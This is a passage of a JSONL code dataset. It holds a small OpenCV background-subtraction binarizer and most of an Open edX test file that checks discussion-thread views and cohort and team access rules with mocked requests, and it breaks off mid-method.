error_code\n","repo_name":"jeff00seattle/pyfortified-requests","sub_path":"pyfortified_requests/errors/error_desc.py","file_name":"error_desc.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34938799333","text":"import cv2\n\nclass Binarizer():\n    def __init__(self, background_path, threshold):\n        self.__background = background_path\n        self.__threshold = threshold\n\n    def binarization(self, image):\n        img_back = cv2.imread(self.__background)\n        img_comp = image\n\n        img_back_gray = cv2.cvtColor(img_back, cv2.COLOR_BGR2GRAY)\n        img_comp_gray = cv2.cvtColor(img_comp, cv2.COLOR_BGR2GRAY)\n\n        img_comp_gray = cv2.blur(img_comp_gray, (3, 3))\n\n        # Generate the difference image between the background and the current frame\n        img_diff = cv2.absdiff(img_back_gray, img_comp_gray)\n\n        # Binarize (monochrome) the difference image, using the threshold passed to the constructor\n        ret, img_bin = cv2.threshold(img_diff, self.__threshold, 255, cv2.THRESH_BINARY_INV)\n\n        return img_bin\n \n","repo_name":"diinuma/ObjectDetection-webcam","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12605978103","text":"\"\"\"\nTests the forum notification views.\n\"\"\"\nimport json\nimport logging\nfrom datetime import datetime\nfrom unittest.mock 
import ANY, Mock, call, patch\n\nimport ddt\nimport pytest\nfrom django.conf import settings\nfrom django.http import Http404\nfrom django.test.client import Client, RequestFactory\nfrom django.test.utils import override_settings\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom edx_django_utils.cache import RequestCache\nfrom edx_toggles.toggles.testutils import override_waffle_flag\nfrom xmodule.modulestore import ModuleStoreEnum\nfrom xmodule.modulestore.django import modulestore\nfrom xmodule.modulestore.tests.django_utils import (\n TEST_DATA_SPLIT_MODULESTORE,\n ModuleStoreTestCase,\n SharedModuleStoreTestCase\n)\nfrom xmodule.modulestore.tests.factories import (\n CourseFactory,\n BlockFactory,\n check_mongo_calls\n)\n\nfrom common.djangoapps.course_modes.models import CourseMode\nfrom common.djangoapps.course_modes.tests.factories import CourseModeFactory\nfrom common.djangoapps.student.roles import CourseStaffRole, UserBasedRole\nfrom common.djangoapps.student.tests.factories import AdminFactory, CourseEnrollmentFactory, UserFactory\nfrom common.djangoapps.util.testing import EventTestMixin, UrlResetMixin\nfrom lms.djangoapps.courseware.exceptions import CourseAccessRedirect\nfrom lms.djangoapps.discussion import views\nfrom lms.djangoapps.discussion.django_comment_client.constants import TYPE_ENTRY, TYPE_SUBCATEGORY\nfrom lms.djangoapps.discussion.django_comment_client.permissions import get_team\nfrom lms.djangoapps.discussion.django_comment_client.tests.group_id import (\n CohortedTopicGroupIdTestMixin,\n GroupIdAssertionMixin,\n NonCohortedTopicGroupIdTestMixin\n)\nfrom lms.djangoapps.discussion.django_comment_client.tests.unicode import UnicodeTestMixin\nfrom lms.djangoapps.discussion.django_comment_client.tests.utils import (\n CohortedTestCase,\n ForumsEnableMixin,\n config_course_discussions,\n topic_name_to_id\n)\nfrom lms.djangoapps.discussion.django_comment_client.utils import strip_none\nfrom lms.djangoapps.discussion.toggles import ENABLE_DISCUSSIONS_MFE\nfrom lms.djangoapps.discussion.views import _get_discussion_default_topic_id, course_discussions_settings_handler\nfrom lms.djangoapps.teams.tests.factories import CourseTeamFactory, CourseTeamMembershipFactory\nfrom openedx.core.djangoapps.course_groups.models import CourseUserGroup\nfrom openedx.core.djangoapps.course_groups.tests.helpers import config_course_cohorts\nfrom openedx.core.djangoapps.course_groups.tests.test_views import CohortViewsTestCase\nfrom openedx.core.djangoapps.django_comment_common.comment_client.utils import CommentClientPaginatedResult\nfrom openedx.core.djangoapps.django_comment_common.models import (\n FORUM_ROLE_STUDENT,\n CourseDiscussionSettings,\n ForumsConfig\n)\nfrom openedx.core.djangoapps.django_comment_common.utils import ThreadContext, seed_permissions_roles\nfrom openedx.core.djangoapps.util.testing import ContentGroupTestCase\nfrom openedx.core.djangoapps.waffle_utils.testutils import WAFFLE_TABLES\nfrom openedx.core.lib.teams_config import TeamsConfig\nfrom openedx.features.content_type_gating.models import ContentTypeGatingConfig\nfrom openedx.features.enterprise_support.tests.mixins.enterprise import EnterpriseTestConsentRequired\n\nlog = logging.getLogger(__name__)\n\nQUERY_COUNT_TABLE_IGNORELIST = WAFFLE_TABLES\n\n\nclass ViewsExceptionTestCase(UrlResetMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def 
setUp(self):\n\n # Patching the ENABLE_DISCUSSION_SERVICE value affects the contents of urls.py,\n # so we need to call super.setUp() which reloads urls.py (because\n # of the UrlResetMixin)\n super().setUp()\n\n # create a course\n self.course = CourseFactory.create(org='MITx', course='999',\n display_name='Robot Super Course')\n\n # Patch the comment client user save method so it does not try\n # to create a new cc user when creating a django user\n with patch('common.djangoapps.student.models.user.cc.User.save'):\n uname = 'student'\n email = 'student@edx.org'\n password = 'test'\n\n # Create the student\n self.student = UserFactory(username=uname, password=password, email=email)\n\n # Enroll the student in the course\n CourseEnrollmentFactory(user=self.student, course_id=self.course.id)\n\n # Log the student in\n self.client = Client()\n assert self.client.login(username=uname, password=password)\n\n config = ForumsConfig.current()\n config.enabled = True\n config.save()\n\n @patch('common.djangoapps.student.models.user.cc.User.from_django_user')\n @patch('common.djangoapps.student.models.user.cc.User.active_threads')\n def test_user_profile_exception(self, mock_threads, mock_from_django_user):\n\n # Mock the code that makes the HTTP requests to the cs_comment_service app\n # for the profiled user's active threads\n mock_threads.return_value = [], 1, 1\n\n # Mock the code that makes the HTTP request to the cs_comment_service app\n # that gets the current user's info\n mock_from_django_user.return_value = Mock()\n\n url = reverse('user_profile',\n kwargs={'course_id': str(self.course.id), 'user_id': '12345'}) # There is no user 12345\n response = self.client.get(url)\n assert response.status_code == 404\n\n @patch('common.djangoapps.student.models.user.cc.User.from_django_user')\n @patch('common.djangoapps.student.models.user.cc.User.subscribed_threads')\n def test_user_followed_threads_exception(self, mock_threads, mock_from_django_user):\n\n # Mock the code that makes the HTTP requests to the cs_comment_service app\n # for the profiled user's active threads\n mock_threads.return_value = CommentClientPaginatedResult(collection=[], page=1, num_pages=1)\n\n # Mock the code that makes the HTTP request to the cs_comment_service app\n # that gets the current user's info\n mock_from_django_user.return_value = Mock()\n\n url = reverse('followed_threads',\n kwargs={'course_id': str(self.course.id), 'user_id': '12345'}) # There is no user 12345\n response = self.client.get(url)\n assert response.status_code == 404\n\n\ndef make_mock_thread_data( # lint-amnesty, pylint: disable=missing-function-docstring\n course,\n text,\n thread_id,\n num_children,\n group_id=None,\n group_name=None,\n commentable_id=None,\n is_commentable_divided=None,\n anonymous=False,\n anonymous_to_peers=False,\n):\n data_commentable_id = (\n commentable_id or course.discussion_topics.get('General', {}).get('id') or \"dummy_commentable_id\"\n )\n thread_data = {\n \"id\": thread_id,\n \"type\": \"thread\",\n \"title\": text,\n \"body\": text,\n \"commentable_id\": data_commentable_id,\n \"resp_total\": 42,\n \"resp_skip\": 25,\n \"resp_limit\": 5,\n \"group_id\": group_id,\n \"anonymous\": anonymous,\n \"anonymous_to_peers\": anonymous_to_peers,\n \"context\": (\n ThreadContext.COURSE if get_team(data_commentable_id) is None else ThreadContext.STANDALONE\n )\n }\n if group_id is not None:\n thread_data['group_name'] = group_name\n if is_commentable_divided is not None:\n thread_data['is_commentable_divided'] = 
is_commentable_divided\n if num_children is not None:\n thread_data[\"children\"] = [{\n \"id\": f\"dummy_comment_id_{i}\",\n \"type\": \"comment\",\n \"body\": text,\n } for i in range(num_children)]\n return thread_data\n\n\ndef make_mock_collection_data( # lint-amnesty, pylint: disable=missing-function-docstring\n course,\n text,\n thread_id,\n num_children=None,\n group_id=None,\n commentable_id=None,\n thread_list=None\n):\n if thread_list:\n return [\n make_mock_thread_data(course=course, text=text, num_children=num_children, **thread)\n for thread in thread_list\n ]\n else:\n return [\n make_mock_thread_data(\n course=course,\n text=text,\n thread_id=thread_id,\n num_children=num_children,\n group_id=group_id,\n commentable_id=commentable_id,\n )\n ]\n\n\ndef make_mock_perform_request_impl( # lint-amnesty, pylint: disable=missing-function-docstring\n course,\n text,\n thread_id=\"dummy_thread_id\",\n group_id=None,\n commentable_id=None,\n num_thread_responses=1,\n thread_list=None,\n anonymous=False,\n anonymous_to_peers=False,\n):\n def mock_perform_request_impl(*args, **kwargs):\n url = args[1]\n if url.endswith(\"threads\") or url.endswith(\"user_profile\"):\n return {\n \"collection\": make_mock_collection_data(\n course, text, thread_id, None, group_id, commentable_id, thread_list\n )\n }\n elif thread_id and url.endswith(thread_id):\n return make_mock_thread_data(\n course=course,\n text=text,\n thread_id=thread_id,\n num_children=num_thread_responses,\n group_id=group_id,\n commentable_id=commentable_id,\n anonymous=anonymous,\n anonymous_to_peers=anonymous_to_peers,\n )\n elif \"/users/\" in url:\n res = {\n \"default_sort_key\": \"date\",\n \"upvoted_ids\": [],\n \"downvoted_ids\": [],\n \"subscribed_thread_ids\": [],\n }\n # comments service adds these attributes when course_id param is present\n if kwargs.get('params', {}).get('course_id'):\n res.update({\n \"threads_count\": 1,\n \"comments_count\": 2\n })\n return res\n else:\n return None\n return mock_perform_request_impl\n\n\ndef make_mock_request_impl( # lint-amnesty, pylint: disable=missing-function-docstring\n course,\n text,\n thread_id=\"dummy_thread_id\",\n group_id=None,\n commentable_id=None,\n num_thread_responses=1,\n thread_list=None,\n anonymous=False,\n anonymous_to_peers=False,\n):\n impl = make_mock_perform_request_impl(\n course,\n text,\n thread_id=thread_id,\n group_id=group_id,\n commentable_id=commentable_id,\n num_thread_responses=num_thread_responses,\n thread_list=thread_list,\n anonymous=anonymous,\n anonymous_to_peers=anonymous_to_peers,\n )\n\n def mock_request_impl(*args, **kwargs):\n data = impl(*args, **kwargs)\n if data:\n return Mock(status_code=200, text=json.dumps(data), json=Mock(return_value=data))\n else:\n return Mock(status_code=404)\n return mock_request_impl\n\n\nclass StringEndsWithMatcher: # lint-amnesty, pylint: disable=missing-class-docstring\n def __init__(self, suffix):\n self.suffix = suffix\n\n def __eq__(self, other):\n return other.endswith(self.suffix)\n\n\nclass PartialDictMatcher: # lint-amnesty, pylint: disable=missing-class-docstring\n def __init__(self, expected_values):\n self.expected_values = expected_values\n\n def __eq__(self, other):\n return all(\n key in other and other[key] == value\n for key, value in self.expected_values.items()\n )\n\n\n@patch('requests.request', autospec=True)\nclass SingleThreadTestCase(ForumsEnableMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n CREATE_USER = False\n\n def setUp(self):\n 
super().setUp()\n\n self.course = CourseFactory.create(discussion_topics={'dummy discussion': {'id': 'dummy_discussion_id'}})\n self.student = UserFactory.create()\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n\n def test_ajax(self, mock_request):\n text = \"dummy content\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id)\n\n request = RequestFactory().get(\n \"dummy_url\",\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = self.student\n response = views.single_thread(\n request,\n str(self.course.id),\n \"dummy_discussion_id\",\n \"test_thread_id\"\n )\n\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n # strip_none is being used to perform the same transform that the\n # django view performs prior to writing thread data to the response\n assert response_data['content'] == strip_none(make_mock_thread_data(\n course=self.course,\n text=text,\n thread_id=thread_id,\n num_children=1\n ))\n mock_request.assert_called_with(\n \"get\",\n StringEndsWithMatcher(thread_id), # url\n data=None,\n params=PartialDictMatcher({\"mark_as_read\": True, \"user_id\": 1, \"recursive\": True}),\n headers=ANY,\n timeout=ANY\n )\n\n def test_skip_limit(self, mock_request):\n text = \"dummy content\"\n thread_id = \"test_thread_id\"\n response_skip = \"45\"\n response_limit = \"15\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id)\n\n request = RequestFactory().get(\n \"dummy_url\",\n {\"resp_skip\": response_skip, \"resp_limit\": response_limit},\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = self.student\n response = views.single_thread(\n request,\n str(self.course.id),\n \"dummy_discussion_id\",\n \"test_thread_id\"\n )\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n # strip_none is being used to perform the same transform that the\n # django view performs prior to writing thread data to the response\n assert response_data['content'] == strip_none(make_mock_thread_data(\n course=self.course,\n text=text,\n thread_id=thread_id,\n num_children=1\n ))\n mock_request.assert_called_with(\n \"get\",\n StringEndsWithMatcher(thread_id), # url\n data=None,\n params=PartialDictMatcher({\n \"mark_as_read\": True,\n \"user_id\": 1,\n \"recursive\": True,\n \"resp_skip\": response_skip,\n \"resp_limit\": response_limit,\n }),\n headers=ANY,\n timeout=ANY\n )\n\n def test_post(self, _mock_request):\n request = RequestFactory().post(\"dummy_url\")\n response = views.single_thread(\n request,\n str(self.course.id),\n \"dummy_discussion_id\",\n \"dummy_thread_id\"\n )\n assert response.status_code == 405\n\n def test_post_anonymous_to_ta(self, mock_request):\n text = \"dummy content\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id,\n anonymous_to_peers=True)\n\n request = RequestFactory().get(\n \"dummy_url\",\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = self.student\n request.user.is_community_ta = True\n response = views.single_thread(\n request,\n str(self.course.id),\n \"dummy_discussion_id\",\n \"test_thread_id\"\n )\n\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n # user is community ta, so response must not have username and user_id fields\n assert 
response_data['content'].get('username') is None\n assert response_data['content'].get('user_id') is None\n\n def test_not_found(self, mock_request):\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # Mock request to return 404 for thread request\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy\", thread_id=None)\n self.assertRaises(\n Http404,\n views.single_thread,\n request,\n str(self.course.id),\n \"test_discussion_id\",\n \"test_thread_id\"\n )\n\n def test_private_team_thread_html(self, mock_request):\n discussion_topic_id = 'dummy_discussion_id'\n thread_id = 'test_thread_id'\n CourseTeamFactory.create(discussion_topic_id=discussion_topic_id)\n user_not_in_team = UserFactory.create()\n CourseEnrollmentFactory.create(user=user_not_in_team, course_id=self.course.id)\n self.client.login(username=user_not_in_team.username, password=self.TEST_PASSWORD)\n\n mock_request.side_effect = make_mock_request_impl(\n course=self.course,\n text=\"dummy\",\n thread_id=thread_id,\n commentable_id=discussion_topic_id\n )\n with patch('lms.djangoapps.teams.api.is_team_discussion_private', autospec=True) as mocked:\n mocked.return_value = True\n response = self.client.get(\n reverse('single_thread', kwargs={\n 'course_id': str(self.course.id),\n 'discussion_id': discussion_topic_id,\n 'thread_id': thread_id,\n })\n )\n assert response.status_code == 200\n assert response['Content-Type'] == 'text/html; charset=utf-8'\n html = response.content.decode('utf-8')\n # Verify that the access denied error message is in the HTML\n assert 'This is a private discussion. You do not have permissions to view this discussion' in html\n\n\nclass AllowPlusOrMinusOneInt(int):\n \"\"\"\n A workaround for the fact that assertNumQueries doesn't let you\n specify a range or any tolerance. 
An 'int' that is 'equal to' its value,\n but also its value +/- 1\n \"\"\"\n\n def __init__(self, value):\n super().__init__()\n self.value = value\n self.values = (value, value - 1, value + 1)\n\n def __eq__(self, other):\n return other in self.values\n\n def __repr__(self):\n return f\"({self.value} +/- 1)\"\n\n\n@ddt.ddt\n@patch('requests.request', autospec=True)\nclass SingleThreadQueryCountTestCase(ForumsEnableMixin, ModuleStoreTestCase):\n \"\"\"\n Ensures the number of modulestore queries and number of sql queries are\n independent of the number of responses retrieved for a given discussion thread.\n \"\"\"\n @ddt.data(\n # split mongo: 3 queries, regardless of thread response size.\n (False, 1, 2, 2, 21, 8),\n (False, 50, 2, 2, 21, 8),\n\n # Enabling Enterprise integration should have no effect on the number of mongo queries made.\n # split mongo: 3 queries, regardless of thread response size.\n (True, 1, 2, 2, 21, 8),\n (True, 50, 2, 2, 21, 8),\n )\n @ddt.unpack\n def test_number_of_mongo_queries(\n self,\n enterprise_enabled,\n num_thread_responses,\n num_uncached_mongo_calls,\n num_cached_mongo_calls,\n num_uncached_sql_queries,\n num_cached_sql_queries,\n mock_request\n ):\n ContentTypeGatingConfig.objects.create(enabled=True, enabled_as_of=datetime(2018, 1, 1))\n with modulestore().default_store(ModuleStoreEnum.Type.split):\n course = CourseFactory.create(discussion_topics={'dummy discussion': {'id': 'dummy_discussion_id'}})\n\n student = UserFactory.create()\n CourseEnrollmentFactory.create(user=student, course_id=course.id)\n\n test_thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(\n course=course, text=\"dummy content\", thread_id=test_thread_id, num_thread_responses=num_thread_responses\n )\n request = RequestFactory().get(\n \"dummy_url\",\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = student\n\n def call_single_thread():\n \"\"\"\n Call single_thread and assert that it returns what we expect.\n \"\"\"\n with patch.dict(\"django.conf.settings.FEATURES\", dict(ENABLE_ENTERPRISE_INTEGRATION=enterprise_enabled)):\n response = views.single_thread(\n request,\n str(course.id),\n \"dummy_discussion_id\",\n test_thread_id\n )\n assert response.status_code == 200\n assert len(json.loads(response.content.decode('utf-8'))['content']['children']) == num_thread_responses\n\n # Test uncached first, then cached now that the cache is warm.\n cached_calls = [\n [num_uncached_mongo_calls, num_uncached_sql_queries],\n # Sometimes there will be one more or fewer sql call than expected, because the call to\n # CourseMode.modes_for_course sometimes does / doesn't get cached and does / doesn't hit the DB.\n # EDUCATOR-5167\n [num_cached_mongo_calls, AllowPlusOrMinusOneInt(num_cached_sql_queries)],\n ]\n for expected_mongo_calls, expected_sql_queries in cached_calls:\n with self.assertNumQueries(expected_sql_queries, table_ignorelist=QUERY_COUNT_TABLE_IGNORELIST):\n with check_mongo_calls(expected_mongo_calls):\n call_single_thread()\n\n\n@patch('requests.request', autospec=True)\nclass SingleCohortedThreadTestCase(CohortedTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def _create_mock_cohorted_thread(self, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_text = \"dummy content\"\n mock_thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=mock_text,\n thread_id=mock_thread_id,\n group_id=self.student_cohort.id,\n 
commentable_id=\"cohorted_topic\",\n )\n return mock_text, mock_thread_id\n\n def test_ajax(self, mock_request):\n mock_text, mock_thread_id = self._create_mock_cohorted_thread(mock_request)\n\n request = RequestFactory().get(\n \"dummy_url\",\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = self.student\n response = views.single_thread(\n request,\n str(self.course.id),\n \"cohorted_topic\",\n mock_thread_id\n )\n\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['content'] == make_mock_thread_data(\n course=self.course,\n commentable_id='cohorted_topic',\n text=mock_text,\n thread_id=mock_thread_id,\n num_children=1,\n group_id=self.student_cohort.id,\n group_name=self.student_cohort.name,\n is_commentable_divided=True\n )\n\n def test_html(self, mock_request):\n _mock_text, mock_thread_id = self._create_mock_cohorted_thread(mock_request)\n\n self.client.login(username=self.student.username, password=self.TEST_PASSWORD)\n response = self.client.get(\n reverse('single_thread', kwargs={\n 'course_id': str(self.course.id),\n 'discussion_id': \"cohorted_topic\",\n 'thread_id': mock_thread_id,\n })\n )\n\n assert response.status_code == 200\n assert response['Content-Type'] == 'text/html; charset=utf-8'\n html = response.content.decode('utf-8')\n\n # Verify that the group name is correctly included in the HTML\n self.assertRegex(html, r'\"group_name\": \"student_cohort\"')\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass SingleThreadAccessTestCase(CohortedTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def call_view(self, mock_request, commentable_id, user, group_id, thread_group_id=None, pass_group_id=True): # lint-amnesty, pylint: disable=missing-function-docstring\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy context\", thread_id=thread_id, group_id=thread_group_id\n )\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n request = RequestFactory().get(\n \"dummy_url\",\n data=request_data,\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = user\n return views.single_thread(\n request,\n str(self.course.id),\n commentable_id,\n thread_id\n )\n\n def test_student_non_cohorted(self, mock_request):\n resp = self.call_view(mock_request, \"non_cohorted_topic\", self.student, self.student_cohort.id)\n assert resp.status_code == 200\n\n def test_student_same_cohort(self, mock_request):\n resp = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n thread_group_id=self.student_cohort.id\n )\n assert resp.status_code == 200\n\n # this test ensures that a thread response from the cs with group_id: null\n # behaves the same as a thread response without a group_id (see: TNL-444)\n def test_student_global_thread_in_cohorted_topic(self, mock_request):\n resp = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n thread_group_id=None\n )\n assert resp.status_code == 200\n\n def test_student_different_cohort(self, mock_request):\n pytest.raises(Http404, (lambda: self.call_view(\n mock_request,\n 'cohorted_topic',\n self.student,\n self.student_cohort.id,\n thread_group_id=self.moderator_cohort.id\n )))\n\n def test_moderator_non_cohorted(self, mock_request):\n resp = self.call_view(mock_request, \"non_cohorted_topic\", 
self.moderator, self.moderator_cohort.id)\n assert resp.status_code == 200\n\n def test_moderator_same_cohort(self, mock_request):\n resp = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.moderator,\n self.moderator_cohort.id,\n thread_group_id=self.moderator_cohort.id\n )\n assert resp.status_code == 200\n\n def test_moderator_different_cohort(self, mock_request):\n resp = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.moderator,\n self.moderator_cohort.id,\n thread_group_id=self.student_cohort.id\n )\n assert resp.status_code == 200\n\n def test_private_team_thread(self, mock_request):\n CourseTeamFactory.create(discussion_topic_id='dummy_discussion_id')\n user_not_in_team = UserFactory.create()\n CourseEnrollmentFactory(user=user_not_in_team, course_id=self.course.id)\n\n with patch('lms.djangoapps.teams.api.is_team_discussion_private', autospec=True) as mocked:\n mocked.return_value = True\n response = self.call_view(\n mock_request,\n 'non_cohorted_topic',\n user_not_in_team,\n ''\n )\n assert 403 == response.status_code\n assert views.TEAM_PERMISSION_MESSAGE == response.content.decode('utf-8')\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass SingleThreadGroupIdTestCase(CohortedTestCase, GroupIdAssertionMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n cs_endpoint = \"/threads/dummy_thread_id\"\n\n def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True, is_ajax=False): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy context\", group_id=self.student_cohort.id\n )\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n headers = {}\n if is_ajax:\n headers['HTTP_X_REQUESTED_WITH'] = \"XMLHttpRequest\"\n\n self.client.login(username=user.username, password=self.TEST_PASSWORD)\n\n return self.client.get(\n reverse('single_thread', args=[str(self.course.id), commentable_id, \"dummy_thread_id\"]),\n data=request_data,\n **headers\n )\n\n def test_group_info_in_html_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=False\n )\n self._assert_html_response_contains_group_info(response)\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=True\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['content']\n )\n\n\n@patch('requests.request', autospec=True)\nclass ForumFormDiscussionContentGroupTestCase(ForumsEnableMixin, ContentGroupTestCase):\n \"\"\"\n Tests `forum_form_discussion api` works with different content groups.\n Discussion blocks are setup in ContentGroupTestCase class i.e\n alpha_block => alpha_group_discussion => alpha_cohort => alpha_user/community_ta\n beta_block => beta_group_discussion => beta_cohort => beta_user\n \"\"\"\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n self.thread_list = [\n {\"thread_id\": \"test_general_thread_id\"},\n {\"thread_id\": \"test_global_group_thread_id\", \"commentable_id\": self.global_block.discussion_id},\n {\"thread_id\": \"test_alpha_group_thread_id\", \"group_id\": self.alpha_block.group_access[0][0],\n \"commentable_id\": 
self.alpha_block.discussion_id},\n {\"thread_id\": \"test_beta_group_thread_id\", \"group_id\": self.beta_block.group_access[0][0],\n \"commentable_id\": self.beta_block.discussion_id}\n ]\n\n def assert_has_access(self, response, expected_discussion_threads):\n \"\"\"\n Verify that a users have access to the threads in their assigned\n cohorts and non-cohorted blocks.\n \"\"\"\n discussion_data = json.loads(response.content.decode('utf-8'))['discussion_data']\n assert len(discussion_data) == expected_discussion_threads\n\n def call_view(self, mock_request, user): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(\n course=self.course,\n text=\"dummy content\",\n thread_list=self.thread_list\n )\n self.client.login(username=user.username, password=self.TEST_PASSWORD)\n return self.client.get(\n reverse(\"forum_form_discussion\", args=[str(self.course.id)]),\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n\n def test_community_ta_user(self, mock_request):\n \"\"\"\n Verify that community_ta user has access to all threads regardless\n of cohort.\n \"\"\"\n response = self.call_view(\n mock_request,\n self.community_ta\n )\n self.assert_has_access(response, 4)\n\n def test_alpha_cohort_user(self, mock_request):\n \"\"\"\n Verify that alpha_user has access to alpha_cohort and non-cohorted\n threads.\n \"\"\"\n response = self.call_view(\n mock_request,\n self.alpha_user\n )\n self.assert_has_access(response, 3)\n\n def test_beta_cohort_user(self, mock_request):\n \"\"\"\n Verify that beta_user has access to beta_cohort and non-cohorted\n threads.\n \"\"\"\n response = self.call_view(\n mock_request,\n self.beta_user\n )\n self.assert_has_access(response, 3)\n\n def test_global_staff_user(self, mock_request):\n \"\"\"\n Verify that global staff user has access to all threads regardless\n of cohort.\n \"\"\"\n response = self.call_view(\n mock_request,\n self.staff_user\n )\n self.assert_has_access(response, 4)\n\n\n@patch('requests.request', autospec=True)\nclass SingleThreadContentGroupTestCase(ForumsEnableMixin, UrlResetMixin, ContentGroupTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n\n def assert_can_access(self, user, discussion_id, thread_id, should_have_access):\n \"\"\"\n Verify that a user has access to a thread within a given\n discussion_id when should_have_access is True, otherwise\n verify that the user does not have access to that thread.\n \"\"\"\n def call_single_thread():\n self.client.login(username=user.username, password=self.TEST_PASSWORD)\n return self.client.get(\n reverse('single_thread', args=[str(self.course.id), discussion_id, thread_id])\n )\n\n if should_have_access:\n assert call_single_thread().status_code == 200\n else:\n assert call_single_thread().status_code == 404\n\n def test_staff_user(self, mock_request):\n \"\"\"\n Verify that the staff user can access threads in the alpha,\n beta, and global discussion blocks.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy content\", thread_id=thread_id)\n\n for discussion_xblock in [self.alpha_block, self.beta_block, self.global_block]:\n self.assert_can_access(self.staff_user, discussion_xblock.discussion_id, thread_id, True)\n\n def test_alpha_user(self, mock_request):\n \"\"\"\n Verify that the alpha user can access threads in the 
alpha and\n global discussion blocks.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy content\", thread_id=thread_id)\n\n for discussion_xblock in [self.alpha_block, self.global_block]:\n self.assert_can_access(self.alpha_user, discussion_xblock.discussion_id, thread_id, True)\n\n self.assert_can_access(self.alpha_user, self.beta_block.discussion_id, thread_id, False)\n\n def test_beta_user(self, mock_request):\n \"\"\"\n Verify that the beta user can access threads in the beta and\n global discussion blocks.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy content\", thread_id=thread_id)\n\n for discussion_xblock in [self.beta_block, self.global_block]:\n self.assert_can_access(self.beta_user, discussion_xblock.discussion_id, thread_id, True)\n\n self.assert_can_access(self.beta_user, self.alpha_block.discussion_id, thread_id, False)\n\n def test_non_cohorted_user(self, mock_request):\n \"\"\"\n Verify that the non-cohorted user can access threads in just the\n global discussion blocks.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy content\", thread_id=thread_id)\n\n self.assert_can_access(self.non_cohorted_user, self.global_block.discussion_id, thread_id, True)\n\n self.assert_can_access(self.non_cohorted_user, self.alpha_block.discussion_id, thread_id, False)\n\n self.assert_can_access(self.non_cohorted_user, self.beta_block.discussion_id, thread_id, False)\n\n def test_course_context_respected(self, mock_request):\n \"\"\"\n Verify that course threads go through discussion_category_id_access method.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy content\", thread_id=thread_id\n )\n\n # Beta user does not have access to alpha_block.\n self.assert_can_access(self.beta_user, self.alpha_block.discussion_id, thread_id, False)\n\n def test_standalone_context_respected(self, mock_request):\n 